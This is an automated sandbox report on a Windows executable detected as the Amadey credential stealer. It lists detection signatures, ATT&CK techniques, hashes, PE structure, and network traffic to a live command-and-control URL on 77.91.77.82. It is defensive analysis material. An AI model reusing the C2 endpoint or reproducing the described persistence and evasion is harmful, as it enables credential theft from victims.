                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeCode function: 0_2_05490C90 rdtsc 0_2_05490C90
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00EC643B mov eax, dword ptr fs:[00000030h]7_2_00EC643B
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00ECA1A2 mov eax, dword ptr fs:[00000030h]7_2_00ECA1A2
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
                    Source: explorti.exe, explorti.exe, 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: yHProgram Manager
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00EAD2E8 cpuid 7_2_00EAD2E8
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00EACAED GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,7_2_00EACAED
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00E96590 LookupAccountNameA,7_2_00E96590

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Amadeys stealer DLL
                    Source: Yara matchFile source: 7.2.explorti.exe.e90000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.gNo9ad9KO4.exe.160000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.explorti.exe.e90000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.explorti.exe.e90000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000003.1640045336.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1665651650.0000000004990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000003.2319286062.0000000004810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1720834507.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1706078385.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1680219093.0000000000161000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.1680559275.0000000005660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Command and Scripting Interpreter                    		1
                    Scheduled Task/Job                    		12
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		251
                    Virtualization/Sandbox Evasion                    		LSASS Memory741
                    Security Software Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		12
                    Process Injection                    		Security Account Manager2
                    Process Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Deobfuscate/Decode Files or Information                    		NTDS251
                    Virtualization/Sandbox Evasion                    		Distributed Component Object ModelInput Capture11
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                    Obfuscated Files or Information                    		LSA Secrets1
                    Application Window Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                    Software Packing                    		Cached Domain Credentials1
                    Account Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSync1
                    System Owner/User Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    File and Directory Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow224
                    System Information Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    gNo9ad9KO4.exe51%VirustotalBrowse
                    gNo9ad9KO4.exe100%AviraTR/Crypt.TPM.Gen
                    gNo9ad9KO4.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe51%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://77.91.77.82/Hun4Ko/index.phpC0%Avira URL Cloudsafe
                    http://77.91.77.82/Hun4Ko/index.phpa0%Avira URL Cloudsafe
                    http://77.91.77.82/Hun4Ko/index.phpM0%Avira URL Cloudsafe
                    http://77.91.77.82/Hun4Ko/index.phpT0%Avira URL Cloudsafe
                    http://77.91.77.82/Hun4Ko/index.phpft0%Avira URL Cloudsafe
                    http://77.91.77.82/Hun4Ko/index.phpk0%Avira URL Cloudsafe
                    http://77.91.77.82/Hun4Ko/index.php100%Avira URL Cloudphishing
                    http://77.91.77.82/Hun4Ko/index.phpW0%Avira URL Cloudsafe
                    http://77.91.77.82/Hun4Ko/index.phpM22%VirustotalBrowse
                    http://77.91.77.82/Hun4Ko/index.phpT22%VirustotalBrowse
                    http://77.91.77.82/Hun4Ko/index.php02k02k02k02k02k02k0%Avira URL Cloudsafe
                    http://77.91.77.82/Hun4Ko/index.phpC23%VirustotalBrowse
                    http://77.91.77.82/Hun4Ko/index.php24%VirustotalBrowse
                    http://77.91.77.82/Hun4Ko/index.phpa21%VirustotalBrowse
                    http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php100%Avira URL Cloudphishing
                    http://77.91.77.82/Hun4Ko/index.phpk21%VirustotalBrowse
                    http://77.91.77.82/Hun4Ko/index.phpW21%VirustotalBrowse
                    http://77.91.77.82/Hun4Ko/index.phpu0%Avira URL Cloudsafe
                    http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php22%VirustotalBrowse
                    http://77.91.77.82/Hun4Ko/index.phpu21%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://77.91.77.82/Hun4Ko/index.phptrue
                    • 24%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://77.91.77.82/Hun4Ko/index.phpTexplorti.exe, 00000007.00000002.2880581504.00000000006FE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 22%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://77.91.77.82/Hun4Ko/index.phpCexplorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 23%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://77.91.77.82/Hun4Ko/index.phpftexplorti.exe, 00000007.00000002.2880581504.00000000006FA000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://77.91.77.82/Hun4Ko/index.phpaexplorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 21%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://77.91.77.82/Hun4Ko/index.phpMexplorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 22%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://77.91.77.82/Hun4Ko/index.phpkexplorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 21%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://77.91.77.82/Hun4Ko/index.phpWexplorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 21%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://77.91.77.82/Hun4Ko/index.php02k02k02k02k02k02kexplorti.exe, 00000007.00000002.2880581504.00000000006FA000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.phpexplorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmptrue
                    • 22%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://77.91.77.82/Hun4Ko/index.phpuexplorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 21%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    77.91.77.82
                    		unknownRussian Federation
                    		42861FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUtrue

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1467935
                    Start date and time:2024-07-05 05:08:05 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 31s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:9
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:gNo9ad9KO4.exe
                    renamed because original name is a hash value
                    Original Sample Name:c2197d56f08530af4a35733cda8cd2fd.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@5/3@0/1
                    EGA Information:
                    • Successful, ratio: 25%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target explorti.exe, PID 7448 because there are no executed function
                    • Execution Graph export aborted for target explorti.exe, PID 7564 because there are no executed function
                    • Execution Graph export aborted for target gNo9ad9KO4.exe, PID 7256 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    04:08:56Task SchedulerRun new task: explorti path: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    23:10:01API Interceptor851x Sleep call for process: explorti.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    77.91.77.82file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                    • 77.91.77.82/Hun4Ko/index.php
                    So7a8eQerR.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                    • 77.91.77.82/Hun4Ko/index.php
                    file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                    • 77.91.77.82/Hun4Ko/index.php
                    file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                    • 77.91.77.82/Hun4Ko/index.php
                    file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                    • 77.91.77.82/Hun4Ko/index.php
                    file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                    • 77.91.77.82/Hun4Ko/index.php
                    file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                    • 77.91.77.82/Hun4Ko/index.php
                    file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                    • 77.91.77.82/Hun4Ko/index.php
                    file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                    • 77.91.77.82/Hun4Ko/index.php
                    file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                    • 77.91.77.82/Hun4Ko/index.php

                    Domains

                    No context

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUfile.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                    • 77.91.77.82
                    So7a8eQerR.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                    • 77.91.77.82
                    file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                    • 77.91.77.81
                    file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                    • 77.91.77.81
                    file.exeGet hashmaliciousClipboard Hijacker, PureLog Stealer, RisePro Stealer, zgRATBrowse
                    • 77.91.77.180
                    file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                    • 77.91.77.81
                    file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                    • 77.91.77.81
                    file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                    • 77.91.77.82
                    file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                    • 77.91.77.82
                    file.exeGet hashmaliciousClipboard Hijacker, PureLog Stealer, RisePro StealerBrowse
                    • 77.91.77.180

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

                    Download File
                    Process:C:\Users\user\Desktop\gNo9ad9KO4.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):1894912
                    Entropy (8bit):7.949850570104973
                    Encrypted:false
                    SSDEEP:49152:5mv1X+giwFocOUfZI3wQbUrtCwwybCEd8:5K1W6bIUgwveE
                    MD5:C2197D56F08530AF4A35733CDA8CD2FD
                    SHA1:EF37D065F5AB7ACBE071150DE940778AD7E80BB5
                    SHA-256:30EB98D8A7A54537B4352F78B44BE53109F3CD82577FA0C9B378BDE020E2890B
                    SHA-512:CD4FC1C8D4043C52B0F190D3D0F7EDE9E2F184E16B3051CB3CC2A55D4205F011F53267BE6F41C2CAC28C9DC998EAD5F8AEB1847C038E66018ED3378A640C1F98
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: Virustotal, Detection: 51%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af..............................J...........@...........................K......i....@.................................X...l...........................8.J..............................J..................................................... . ............................@....rsrc...............................@....idata ............................@... .0*.........................@...adkjkfkz......0.....................@...afyvsewm......J.....................@....taggant.0....J.."..................@...........................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe:Zone.Identifier

                    Download File
                    Process:C:\Users\user\Desktop\gNo9ad9KO4.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:[ZoneTransfer]....ZoneId=0

                    C:\Windows\Tasks\explorti.job

                    Download File
                    Process:C:\Users\user\Desktop\gNo9ad9KO4.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):288
                    Entropy (8bit):3.4620007010637344
                    Encrypted:false
                    SSDEEP:6:6YJtX4RKUEZ+lX1QYShMl6lm6tPjgsW2YRZuy0l1r7zt0:1JZ4RKQ13vg7jzvYRQV1r7zt0
                    MD5:D20F0185BD52EB5BDA558B287BF75755
                    SHA1:B063B92974FFECAB303C9BFA00B72C4E52D4E0BA
                    SHA-256:B22FF96DE01E45AA5E58514CE7A376777898025BDF54E0B6D613602C93ACDE25
                    SHA-512:737A8A98FF2A7A997DA0F9DE81561B747C4A0077DDDFA32E947F144D91B8FCF47B197F7EFDF2C388743D47ED15825E93E9D6E693957AF29F53A4703224393F5A
                    Malicious:false
                    Reputation:low
                    Preview:....H.+.^..K....#.VF.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.d.4.0.9.7.1.b.6.b.\.e.x.p.l.o.r.t.i...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.949850570104973
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:gNo9ad9KO4.exe
                    File size:1'894'912 bytes
                    MD5:c2197d56f08530af4a35733cda8cd2fd
                    SHA1:ef37d065f5ab7acbe071150de940778ad7e80bb5
                    SHA256:30eb98d8a7a54537b4352f78b44be53109f3cd82577fa0c9b378bde020e2890b
                    SHA512:cd4fc1c8d4043c52b0f190d3d0f7ede9e2f184e16b3051cb3cc2a55d4205f011f53267be6f41c2cac28c9dc998ead5f8aeb1847c038e66018ed3378a640c1f98
                    SSDEEP:49152:5mv1X+giwFocOUfZI3wQbUrtCwwybCEd8:5K1W6bIUgwveE
                    TLSH:7B9533289347395BC39D1C73A2A3471BF7788DC706EBAC783A50271569D32246ACB7C6
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

                    File Icon

                    Icon Hash:90cececece8e8eb0

                    Static PE Info

                    General

                    Entrypoint:0x8ad000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x6661EA84 [Thu Jun 6 16:57:40 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                    Entrypoint Preview

                    Instruction
                    jmp 00007F4688C6706Ah
                    bswap eax
                    sbb al, 00h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    jmp 00007F4688C69065h
                    add byte ptr [ebx], al
                    or al, byte ptr [eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], dh
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax+00000000h], al
                    add byte ptr [eax], al
                    add byte ptr [edx], ah
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], cl
                    add byte ptr [eax], 00000000h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    adc byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add ecx, dword ptr [edx]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0580x6c.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x4aaf380x10adkjkfkz
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x4aaee80x18adkjkfkz
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    0x10000x680000x2dc003d14346fcff343129bf069242c2f65cbFalse0.9984631147540983data7.988500981589288IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x690000x1e00x200bb1d3aee5efd0fd8cc96a30c6a560f48False0.576171875data4.486579218469371IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata 0x6a0000x10000x2006e66ae8f9a75bc604a087c954abf8737False0.15234375data1.0684380430289213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    0x6b0000x2a30000x200e18cd50480d5e8e1c31717cd29ad2de9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    adkjkfkz0x30e0000x19e0000x19d200c8fc1144ea0fa1ea829e3491092afef1False0.9944319686081694data7.953327902515579IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    afyvsewm0x4ac0000x10000x400ac9eff5932ff932e45903377564b2e1bFalse0.828125data6.4192908878038475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant0x4ad0000x30000x2200534f3aee2a1a976ef32f0f39410a17f1False0.06158088235294118DOS executable (COM)0.7250773113842407IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                    Resources

                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_MANIFEST0x4aaf480x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                    Imports

                    DLLImport
                    kernel32.dlllstrcpy

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    07/05/24-05:10:03.058996TCP2856147ETPRO TROJAN Amadey CnC Activity M34973780192.168.2.477.91.77.82

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jul 5, 2024 05:10:03.052897930 CEST4973780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:03.058708906 CEST804973777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:03.058800936 CEST4973780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:03.058995962 CEST4973780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:03.063816071 CEST804973777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:03.766336918 CEST804973777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:03.769637108 CEST4973780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:03.771302938 CEST4973780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:03.776175976 CEST804973777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:03.996983051 CEST804973777.91.77.82192.168.2.4
